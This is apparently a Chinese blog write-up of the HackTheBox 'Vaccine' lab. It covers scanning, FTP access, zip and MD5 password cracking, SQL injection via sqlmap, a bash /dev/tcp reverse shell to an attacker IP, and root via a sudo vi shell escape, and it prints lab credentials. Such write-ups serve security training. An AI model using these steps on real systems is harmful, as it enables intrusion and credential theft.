HackTheBox-Vaccine

连接配置

参考之前写的连接配置,文章链接

信息搜集

使用nmap对场景给出的ip地址进行扫描

nmap -sS -A 10.10.10.46 

在这里插入图片描述

发现其开放了21、22和80端口,利用上一场景得到的FTP用户凭据 ftpuser/mc@F1l3ZilL4,尝试登陆FTP服务

登录FTP

ftp 10.10.10.46
Name:ftpuser
Password:mc@F1l3ZilL4

在这里插入图片描述

登陆后利用 dir命令列出所有的文件,发现存在 backup.zip 压缩包,利用 get命令下载下来

在这里插入图片描述

发现下载下来的 backup.zip 是加密的,尝试利用 Kali 中的 john 来破解压缩包密码

破解压缩包密码

首先生成压缩包的hash值

zip2john backup.zip > hash

利用 Kali 中自带的字典 rockyou.txt,将 rockyou.txt.gz 复制到桌面上并用 gzip解压缩

在这里插入图片描述

使用 john来指定字典破解密码

john hash --fork=4 -w rockyou.txt 2>/dev/null
--fork=4:4个进程
-w:指定字典路径
2>/dev/null:将错误输出到黑洞(不显示)

John破解得到压缩包密码:741852963

在这里插入图片描述

利用 unzip解压 backup.zip得到 index.php 以及 style.css

在这里插入图片描述

获取登录密码

查看 index.php 发现存在 admin账户以及其密码的MD5值

在这里插入图片描述

利用网站在线破解一下这串hash值,网站链接,得到密码为:qwerty789

在这里插入图片描述

登录网站

利用 admin/qwerty789 登录网站

在这里插入图片描述

查看一下网站发现处于右上角的搜索框之外并没有什么利用点,在搜索框随便输入点内容,利用burp suite抓个包将内容保存下来

在这里插入图片描述

利用sqlmap进行测试

sqlmap -r Vaccine.txt 

在这里插入图片描述

发现确实存在注入点,并且后台数据库为PostgreSQL

在这里插入图片描述

getshell

由于是sql注入点,采用 --os-shell 来getshell

在这里插入图片描述

先起一个监听

nc -nvvlp 1234

然后在 os-shell 中输入 bash -c 'bash -i >& /dev/tcp/10.10.16.53/1234 0>&1' 来反弹shell

在这里插入图片描述

升级shell

将升级 shell 升级为 tty,得到一个交互式的shell

在这里插入图片描述

查找文件发现/var/www/html目录下的dashboard.php存在当前用户postgres的密码P@s5w0rd!

在这里插入图片描述

提权

验证用户密码查看自己当前的权限

sudo -l

在这里插入图片描述

发现用户被允许编辑配置文件 /etc/postgresql/11/main/pg_hba.conf,可以利用vi并验证密码提权至root
进入vi界面后可能会界面重叠,直接输入:!/bin/bash再点击回车即可,输入whoami发现已经成功提权为root

在这里插入图片描述

进入/root目录下,查看 root.txt 文件,即可拿到SYSTEM OWN的Flag

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值